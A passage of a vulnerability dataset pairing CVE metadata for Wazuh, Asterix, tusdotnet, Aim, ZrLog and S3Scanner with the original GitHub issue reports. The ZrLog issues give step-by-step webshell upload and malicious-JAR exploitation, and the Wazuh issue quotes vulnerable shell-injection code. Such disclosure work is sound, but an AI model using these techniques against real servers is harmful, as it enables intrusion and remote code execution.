|Backtick (`` ` ``)|`\x60`| | Active response tools allow arbitrary code execution | https://api.github.com/repos/wazuh/wazuh/issues/10858/comments | 13 | 2021-11-16T09:26:07Z | 2021-12-10T16:54:42Z | https://github.com/wazuh/wazuh/issues/10858 | 1,054,644,643 | 10,858 | 2,801 |
CVE-2021-44079 | 2021-11-22T07:15:07.017 | In the wazuh-slack active response script in Wazuh 4.2.x before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/pull/10809"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/pull/10809"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07EA0D69-0063-4F4A-83A9-65FB55D7B714",
"versionEndExcluding": "4.2.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"77"
] | 77 | https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"wazuh",
"wazuh"
] | |Wazuh version|Component|Install type|Install method|Platform|Fix|
|---|---|---|---|---|---|
| 4.2.0 | Active-response script | Manager/Agent | Packages | CentOS 7 |#10809|
This issue was reported by @rk700.
We found a command injection bug in the active-response script [wazuh-slack](https://github.com/wazuh/wazuh/blob/master/src/active-response/wazuh-slack.c).
The alert JSON data is put in the shell command line as POST body for `curl`:
```c
snprintf(system_command, OS_MAXSTR -1, "curl -H \"Accept: application/json\" -H \"Content-Type: application/json\" -d '%s' %s", output_str, site_url);
```
However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command:
```
-d '<json data that could be partially controlled>'
```
## Remediation
1. Prevent default Active Response tools from executing arbitrary code. Replace `system()` function call with `wpopenv()`, which executes subprocesses without a shell.
|Active response tool|Platform|
|---|---|
|`disable-account`|UNIX|
|`firewalld-drop`|Linux|
|`netsh`|Windows|
|`route-null`|Windows|
|`wazuh-slack`|UNIX|
2. Sanitize the AR payload by the manager for agents between 4.2.0 and 4.2.4, in order to prevent this hazard in outdated agents. Convert control characters into their hexadecimal notation:
|Character|Conversion|
|---|---|
|Exclamation mark (`!`)|`\x21`|
|Dollar (`$`)|`\x24`|
|Single quote (`'`)|`\x27`|
|Backtick (`` ` ``)|`\x60`| | Active response tools allow arbitrary code execution | https://api.github.com/repos/wazuh/wazuh/issues/10858/comments | 13 | 2021-11-16T09:26:07Z | 2021-12-10T16:54:42Z | https://github.com/wazuh/wazuh/issues/10858 | 1,054,644,643 | 10,858 | 2,802 |
CVE-2021-44144 | 2021-11-22T21:15:07.507 | Croatia Control Asterix 2.8.1 has a heap-based buffer over-read, with additional details to be disclosed at a later date. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/CroatiaControlLtd/asterix/issues/183"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/CroatiaControlLtd/asterix/issues/183"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:crocontrol:asterix:2.8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6ADACC-12A9-41D5-A46A-764BD03E2328",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/CroatiaControlLtd/asterix/issues/183 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"CroatiaControlLtd",
"asterix"
] | 👋 Hello, @dsalantic, @ifsnop, @bbertrand - a potential medium severity Heap-based Buffer Overflow vulnerability in your repository has been disclosed to us.
#### Next Steps
1️⃣ Visit **https://huntr.dev/bounties/1-other-CroatiaControlLtd/asterix** for more advisory information.
2️⃣ **[Sign-up](https://huntr.dev/)** to validate or speak to the researcher for more assistance.
3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid.
---
#### Confused or need more help?
- Join us on our **[Discord](https://huntr.dev/discord)** and a member of our team will be happy to help! 🤗
- Speak to a member of our team: @JamieSlome
---
*This issue was automatically generated by [huntr.dev](https://huntr.dev) - a bug bounty board for securing open source code.* | 🚨 Potential Heap-based Buffer Overflow | https://api.github.com/repos/CroatiaControlLtd/asterix/issues/183/comments | 2 | 2021-05-21T21:15:06Z | 2021-11-23T08:30:49Z | https://github.com/CroatiaControlLtd/asterix/issues/183 | 898,533,228 | 183 | 2,803 |
CVE-2021-44150 | 2021-11-22T22:15:07.350 | The client in tusdotnet through 2.5.0 relies on SHA-1 to prevent spoofing of file content. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tusdotnet/tusdotnet/issues/157"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tusdotnet/tusdotnet/issues/157"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:transloadit:tusdotnet:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7AAB1BBC-8675-44A2-890D-5E2B3DCC185B",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"326"
] | 326 | https://github.com/tusdotnet/tusdotnet/issues/157 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tusdotnet",
"tusdotnet"
] | SHA-1 is not collision-resistant, which makes it easier for context-dependent attackers to conduct tampering attacks and alter the checksum which makes it possible to alter the file being uploaded itself. For a long time, it has been possible "to find collisions for SHA1 and that thus it is not secure to use for digital signatures, file integrity, and file identification purposes". see: https://arstechnica.com/information-technology/2017/02/at-deaths-door-for-years-widely-used-sha1-function-is-now-dead/
Also:
https://www.cvedetails.com/cve/CVE-2005-4900/
https://cwe.mitre.org/data/definitions/328.html
Finding:
https://github.com/tusdotnet/tusdotnet/blob/ca23bdd88f5b63545c6fb9c2ed18b12984da3078/Source/tusdotnet/Extensions/Internal/FileStreamExtensions.cs
https://github.com/tusdotnet/tusdotnet/blob/ca23bdd88f5b63545c6fb9c2ed18b12984da3078/Source/tusdotnet/Stores/TusDiskStore.cs#L190
https://github.com/tusdotnet/tusdotnet/blob/3d933e56768f3233a66417a6f9413364fb8bec37/Source/tusdotnet/Interfaces/ITusChecksumStore.cs#L17
https://github.com/tusdotnet/tusdotnet/blob/2fdded4e2e5682a92cf102b0d1bae12e3dec06fe/Source/tusdotnet/Stores/TusDiskStore.cs#L248
https://github.com/tusdotnet/tusdotnet/blob/c3f6f93bd3f0c76a5fd6572835a8d0f5f15909db/Source/tusdotnet/Helpers/ChecksumTrailerHelper.cs
https://github.com/tusdotnet/tusdotnet/blob/c3f6f93bd3f0c76a5fd6572835a8d0f5f15909db/Source/tusdotnet/Helpers/ChecksumTrailerHelper.cs#L15 | Tus client uses a deprecated cryptographic function to calculate the file checksums | https://api.github.com/repos/tusdotnet/tusdotnet/issues/157/comments | 4 | 2021-11-22T11:42:09Z | 2021-12-07T11:55:42Z | https://github.com/tusdotnet/tusdotnet/issues/157 | 1,060,053,964 | 157 | 2,804 |
CVE-2021-43775 | 2021-11-23T21:15:20.347 | Aim is an open-source, self-hosted machine learning experiment tracking tool. Versions of Aim prior to 3.1.0 are vulnerable to a path traversal attack. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. The vulnerability issue is resolved in Aim v3.1.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/aimhubio/aim/issues/999"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/aimhubio/aim/pull/1003"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/aimhubio/aim/pull/1003/commits/f01266a1a479ef11d7d6c539e7dd89e9d5639738"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/aimhubio/aim/security/advisories/GHSA-8phj-f9w2-cjcc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/aimhubio/aim/issues/999"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/aimhubio/aim/pull/1003"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/aimhubio/aim/pull/1003/commits/f01266a1a479ef11d7d6c539e7dd89e9d5639738"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/aimhubio/aim/security/advisories/GHSA-8phj-f9w2-cjcc"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:aimstack:aim:*:*:*:*:*:python:*:*",
"matchCriteriaId": "AE237926-EEBB-4E1F-9F74-FB5845332FC8",
"versionEndExcluding": "3.1.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/aimhubio/aim/issues/999 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"aimhubio",
"aim"
] | What would be the right contact to report a security vulnerabilty? thanks! | Security vulnerabilty | https://api.github.com/repos/aimhubio/aim/issues/999/comments | 3 | 2021-11-11T12:25:17Z | 2021-11-22T22:01:39Z | https://github.com/aimhubio/aim/issues/999 | 1,050,926,195 | 999 | 2,805 |
CVE-2021-44093 | 2021-11-28T21:15:08.140 | A Remote Command Execution vulnerability on the background in zrlog 2.2.2, at the upload avatar function, could bypass the original limit, upload the JSP file to get a WebShell | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/94fzb/zrlog/issues/115"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/94fzb/zrlog/issues/115"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zrlog:zrlog:2.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "EE12F09D-97E1-4D23-BCBC-300E40800811",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/94fzb/zrlog/issues/115 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"94fzb",
"zrlog"
] | there is a remote command execution vulnerability at the upload avatar function on the background.
<img width="1792" alt="image" src="https://user-images.githubusercontent.com/24983597/141939276-609ba696-f974-470f-8c2e-2e1cf67e98c6.png">
upload pictures, then intercept data package, like this

then modify the file name to `jsp`, you can bypass the limit that cannot be uploaded by JSP files.

although JSP files have been uploaded, because of the existence of global interceptors, we cannot execute commands.
it would return 500
<img width="912" alt="image" src="https://user-images.githubusercontent.com/24983597/141940263-627894b2-c89f-4ccf-9735-262d6ecbe303.png">
however, through my research, I found that the upload directory can be traversed.
just modify the parameter `dir`, like this

then the file will be saved to the corresponding directory.
<img width="702" alt="image" src="https://user-images.githubusercontent.com/24983597/141940679-f61ea194-cbd8-4290-bdfe-cbc942d52278.png">
access this file, successfully execute system command
<img width="901" alt="image" src="https://user-images.githubusercontent.com/24983597/141940898-eeb516d3-39e2-4320-950b-62a823cb2a8c.png">
---
Code analysis.
at `com.zrlog.admin.web.controller.api.UploadController#generatorUri`
```java
getFile().getFileName().substring(getFile(uploadFieldName).getFileName().lastIndexOf(".") + 1).toLowerCase();
```
<img width="1792" alt="image" src="https://user-images.githubusercontent.com/24983597/141941772-a6fb023a-1ded-4fb6-b0ea-e77cd5569736.png">
```java
Constants.ATTACHED_FOLDER + getPara("dir") + "/" + sdf.format(new Date()) + "/" + df.format(new Date()) + "_" + new Random().nextInt(1000) + "." + fileExt;
```
<img width="1792" alt="image" src="https://user-images.githubusercontent.com/24983597/141942105-c7d089e4-f41f-4ea8-86f0-710a89b0c136.png">
| ZrLog 2.2.2 Remote command execution vulnerability | https://api.github.com/repos/94fzb/zrlog/issues/115/comments | 0 | 2021-11-16T07:45:28Z | 2023-04-15T04:40:43Z | https://github.com/94fzb/zrlog/issues/115 | 1,054,555,017 | 115 | 2,806 |
CVE-2021-44094 | 2021-11-28T21:15:08.230 | ZrLog 2.2.2 has a remote command execution vulnerability at plugin download function, it could execute any JAR file | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/94fzb/zrlog/issues/116"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/94fzb/zrlog/issues/116"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zrlog:zrlog:2.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "EE12F09D-97E1-4D23-BCBC-300E40800811",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/94fzb/zrlog/issues/116 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"94fzb",
"zrlog"
] | Just download a plugin and intercept your data package.
<img width="1791" alt="image" src="https://user-images.githubusercontent.com/24983597/141977057-f4d164bc-c5a7-4e03-b6c2-120cb15a6e5e.png">
data package like this
<img width="675" alt="image" src="https://user-images.githubusercontent.com/24983597/141977295-6053c0a8-a718-4f25-9a92-8d25279a134a.png">
modify the JAR just downloaded, join the malicious code in the startup class.
<img width="1542" alt="image" src="https://user-images.githubusercontent.com/24983597/141977772-fc35e677-2794-4352-b054-4a85ef1919c9.png">
then modify the parameter `host` to the malicious JAR file download address
<img width="1758" alt="image" src="https://user-images.githubusercontent.com/24983597/141977859-1e33fd73-7622-4b3e-88b6-b45024dfc82c.png">
after download, malicious code will be executed
<img width="894" alt="image" src="https://user-images.githubusercontent.com/24983597/141977971-b961c26c-1b29-489f-90ce-00d565ea2798.png">
---
Download Record
<img width="805" alt="image" src="https://user-images.githubusercontent.com/24983597/141978068-de352e08-b915-4865-b0bf-77ebeb493def.png"> | ZrLog 2.2.2 has a remote command execution vulnerability at plugin download function | https://api.github.com/repos/94fzb/zrlog/issues/116/comments | 0 | 2021-11-16T11:45:07Z | 2023-04-15T04:40:43Z | https://github.com/94fzb/zrlog/issues/116 | 1,054,782,351 | 116 | 2,807 |
CVE-2021-32061 | 2021-11-29T03:15:06.713 | S3Scanner before 2.0.2 allows Directory Traversal via a crafted bucket, as demonstrated by a <Key>../ substring in a ListBucketResult element. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/sa7mon/S3Scanner/issues/122"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/sa7mon/S3Scanner/releases/tag/2.0.2"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://vuln.ryotak.me/advisories/62"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/sa7mon/S3Scanner/issues/122"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/sa7mon/S3Scanner/releases/tag/2.0.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuln.ryotak.me/advisories/62"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:s3scanner_project:s3scanner:*:*:*:*:*:*:*:*",
"matchCriteriaId": "877DA417-7D7D-462E-A979-BA23C5F2EED6",
"versionEndExcluding": "2.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/sa7mon/S3Scanner/issues/122 | [
"Third Party Advisory"
] | github.com | [
"sa7mon",
"S3Scanner"
] | ## tl;dr
In version 2.0.1 and older of S3Scanner, if a user attempts to dump the contents of a bucket which contains objects with special characters in their keys, those characters can be used to save the files outside of the folder specified with `--dump-dir`.
## Thanks
I'd like to give a huge thanks to a security researcher named [RyotaK](https://twitter.com/ryotkak) for reporting this issue to me. They provided a detailed explanation and helped walk me through the steps to reproduce. Very excellent experience.
## The Bug
The issue is what's commonly known as a "path traversal" vulnerability. In this case, though, it's the ability to *save* files outside the intended area as opposed to *reading* files.
For example: this bucket was created by RyotaK for demonstration purposes.
<img src="https://user-images.githubusercontent.com/3712226/143785640-495acf39-ff99-4bcf-8236-42abd04f2e23.png" alt="screenshot of an S3 bucket listing showing a key called '../' and '../test.txt'" />
See how the object keys contain `../` ? When S3Scanner goes to download that file, it concatenates the dump directory and this key to form the file path the file should get downloaded to. So if a user ran the following command:
```bash
s3scanner dump --dump-dir /projects/s3scanner/buckets/ --bucket s3scanner-test-bucket
```
they would end up with a file called `test.txt` in `/projects/s3scanner/` which is one level up from where they wanted it. By adding a bunch of these characters together (`../../../../../`) an attacker could craft a malicious object key which would place their file anywhere on the S3Scanner user's system.
You may be surprised (like I was) to learn that AWS allows such characters in object keys. Their documentation [explains](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html) that while you can do this, there are limitations:
> ...
>
> In addition, be aware of the following prefix limitations:
>
> - Objects with a prefix of "./" must uploaded or downloaded with the AWS Command Line Interface (AWS CLI), AWS SDKs, or REST API. You cannot use the Amazon S3 console.
>
> - Objects with a prefix of "../" cannot be uploaded using the AWS Command Line Interface (AWS CLI) or Amazon S3 console.
In the "real world" the chances of an S3Scanner user encountering a bucket with these "malicious" keys is very low - especially considering I was not able to create such a bucket of my own. This threat poses a fairly low risk since the difficulty of pulling off the attack is a bit high and would only happen if a bad actor was purposely targeting users of this tool.
RyotaK has engaged MITRE who has reserved [CVE-2021-32061](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32061) for this vulnerability. The CVE will be updated after this advisory has been posted.
## Remediation
